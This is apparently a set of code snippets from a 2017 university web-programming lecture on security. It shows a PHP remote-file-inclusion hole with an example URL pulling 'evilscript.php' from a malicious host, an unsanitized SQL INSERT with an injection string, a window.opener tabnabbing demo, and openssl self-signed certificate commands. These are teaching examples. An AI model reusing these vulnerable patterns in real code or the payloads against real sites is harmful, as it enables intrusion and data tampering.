CS174
Chris Pollett
Apr 26,2017
<html><head>...</head> <body> <div id="leftcolumn"> <ul><li><a href="?c=n.html">News</a></li> <li><a href="?c=d.html">Discussions</a></li></ul> </div> <div id="content"> <?php if(isset($_GET['c'])){include($_GET['c']);} else {include("default.php");} ?> </div></body></html>
http://somewhere.com/?c=http://www.mymalicioussite.com/evilscript.php
$sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('{$_POST['reg_username']}', $_POST[ '$reg_password'], '{$_POST['reg_email']}')";
bad_guy', 'mypass', ''), ('good_guy?
<script> document.write("<button onclick='childOpener()'>Open Child Tab</button>"); function childOpener() { var child_tab = window.open("", "_blank"); // aside: replace "" with some url // if want to open tab at diff site child_tab.document.write( "<!DOCTYPE html>" + "<html><head><title>Child Script Test</title></head>" + "<body>" + "<p><button onclick='changeParent()'>Change Parent</button></p>" + "<script>" + "function changeParent() {" + " window.opener.document.write('<p>New content for parent tab</p>');" + " window.opener.document.stop()" + "} <" + "/script></body></html>"); child_tab.stop(); child_tab.focus(); } </script>
<a href="http://somewhere.com/" target="_blank" rel="noopener noreferrer">Go Somewhere</a>
LoadModule ssl_module libexec/apache2/mod_ssl.so
server.key and server.crt
openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt(
openssl s_client -crlf -connect pollett.org:443 ...This will print info about the establishment of the SSL connection including SSL certificate and handshake, after which you can enter normal HTTP commands ... GET / HTTP/1.1 Host: pollett.org ...get web page page...